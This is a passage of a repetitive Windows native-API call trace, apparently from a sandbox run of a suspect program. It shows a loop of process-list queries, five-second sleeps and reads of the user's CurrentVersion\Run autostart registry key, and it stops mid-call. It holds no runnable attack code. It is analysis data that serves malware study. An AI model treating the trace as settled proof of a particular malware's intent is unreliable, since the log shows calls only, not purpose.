NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.259] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.271] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.272] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.272] NtClose (Handle=0x154) returned 0x0 [0182.272] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.272] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.273] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.275] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.286] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.286] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.287] NtClose (Handle=0x154) returned 0x0 [0182.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.290] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.291] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.302] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.302] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.302] NtClose (Handle=0x154) returned 0x0 [0182.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.304] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.306] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.317] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.318] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.318] NtClose (Handle=0x154) returned 0x0 [0182.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.319] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.319] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.320] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.321] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.333] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.334] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.334] NtClose (Handle=0x154) returned 0x0 [0182.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.340] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.350] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.350] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.350] NtClose (Handle=0x154) returned 0x0 [0182.351] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.351] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.351] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.352] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.352] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.354] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.355] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.364] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.364] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.365] NtClose (Handle=0x154) returned 0x0 [0182.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.366] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.366] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.368] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.368] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.381] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.381] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.381] NtClose (Handle=0x154) returned 0x0 [0182.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.382] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.386] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.396] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.396] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.396] NtClose (Handle=0x154) returned 0x0 [0182.396] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.396] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.399] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.411] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.411] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.411] NtClose (Handle=0x154) returned 0x0 [0182.411] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.413] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.416] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.427] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.427] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.427] NtClose (Handle=0x154) returned 0x0 [0182.427] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.427] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.431] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.442] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.443] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.443] NtClose (Handle=0x154) returned 0x0 [0182.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.446] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.447] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.458] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.458] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.458] NtClose (Handle=0x154) returned 0x0 [0182.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.462] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.474] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 